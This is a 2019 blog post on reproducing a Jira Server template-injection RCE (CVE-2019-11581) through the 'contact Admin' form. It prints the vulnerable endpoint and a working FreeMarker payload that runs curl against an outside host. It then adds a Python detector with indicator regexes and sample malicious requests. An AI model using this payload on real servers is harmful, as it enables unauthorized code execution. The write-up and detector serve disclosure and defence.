RCE in Jira (CVE-2019-11581)

ruvlol
Jul 13, 2019 · 2 min read

Hello, community.

So, here I will share info about a new critical vulnerability in Jira Server. It was not originally found by me. Four days ago, in the evening, I found a security advisory which claimed that a critical security hole existed in Jira. The very next morning I researched it and had a working exploit.

It wasn’t hard to find a working exploit since Atlassian shared almost all the needed info in the advisory. It said that the “bulk email send” and “contact Admin” functionalities were affected by server-side template injection. “Bulk email send” was immediately discarded since it requires Admin privileges to exploit. As for the next one, “contact Admin”, it is exploitable if these conditions are met:

  1. The functionality is turned on. It is turned off by default.
  2. Jira is not covered by an ACL, firewall or SSO provider that prevents unauthenticated access.

I installed my own trial Jira, turned “contact Admin” on and started testing.

The “contact Admin” functionality is accessible at this URL:

https://jiraserver/secure/ContactAdministrators!default.jspa

And if invoked from the UI, the button is:

(screenshot: the “contact Admin” button in the Jira UI)

Now let’s figure out the payload. Jira uses the FreeMarker template engine, which I am familiar with. The first thing I tried was inserting a known payload into all fields.

The payload was:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://avtohanter.ru/rcetest?a=a').waitFor()

pasted into the contact form:

(screenshot: the payload pasted into the contact form fields)

Then I immediately received a bunch of curl callbacks on my host, which confirmed the vulnerability.

(screenshot: the curl callbacks received on the listening host)

Later it turned out that only the “Subject” field is vulnerable, so you can be more precise with testing.
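For defenders, the write-up above gives enough shape to alert on: a POST to the contact-admin endpoint whose form fields carry a template variable reference followed by reflective Java calls. The following detector is an added example (not part of the original post or of any Atlassian tooling); the endpoint prefix comes from the URL above, while the indicator patterns, field names and sample submissions are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# The "contact Admin" form URL from the write-up; the POST target is assumed
# to share the same path prefix as the "!default.jspa" display URL.
CONTACT_ADMIN_PREFIX = "/secure/ContactAdministrators"

# Shapes of the reflective template expression shown on the page. These are
# an assumption about what to alert on, not a vendor-supplied rule.
INDICATORS = {
    "template-var-getclass": re.compile(r"\$\{?\w+\.getClass\(\)"),
    "runtime-classload": re.compile(r"forName\(\s*['\"]java\.lang\.Runtime['\"]"),
    "reflective-invoke": re.compile(r"\.invoke\(\s*null\s*,\s*null\s*\)"),
    "exec-call": re.compile(r"\.exec\("),
}

def scan_text(value):
    """Return the names of indicator patterns present in one form field."""
    return [name for name, pat in INDICATORS.items() if pat.search(value)]

def inspect_request(method, path, body):
    """Flag a form submission to the contact-admin endpoint whose fields carry
    template-injection indicators. Returns {field: [indicator names]}."""
    if method.upper() != "POST" or not path.startswith(CONTACT_ADMIN_PREFIX):
        return {}
    hits = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        found = sorted({n for v in values for n in scan_text(v)})
        if found:
            hits[field] = found
    return hits

# Constructed sample submissions (not real traffic); field names are assumed.
# The second entry mirrors the payload shape from the post with a placeholder
# command in place of the author's curl callback.
SAMPLE_REQUESTS = [
    ("POST", "/secure/ContactAdministrators.jspa",
     "subject=Password+reset&details=Please+reset+my+account"),
    ("POST", "/secure/ContactAdministrators.jspa",
     "subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29"
     ".getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29"
     ".exec%28%27PLACEHOLDER_CMD%27%29.waitFor%28%29&details=hi"),
    ("POST", "/secure/Dashboard.jspa", "subject=%24i18n.getClass%28%29"),
]

def triage(requests=SAMPLE_REQUESTS):
    """Return the indices of sample requests that should raise an alert."""
    return [i for i, (m, p, b) in enumerate(requests) if inspect_request(m, p, b)]
```

Because the only vulnerable field is “Subject”, the per-field result lets an alert name the exact parameter that carried the expression rather than just the endpoint.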

Hope that will help!

By the way, I have a Patreon where I am writing infosec articles. If you are interested you can check it out at https://www.patreon.com/ruvlol . I am working hard to make it a good source of ethical hacking experience; a lot of articles are coming there, including research writeups.
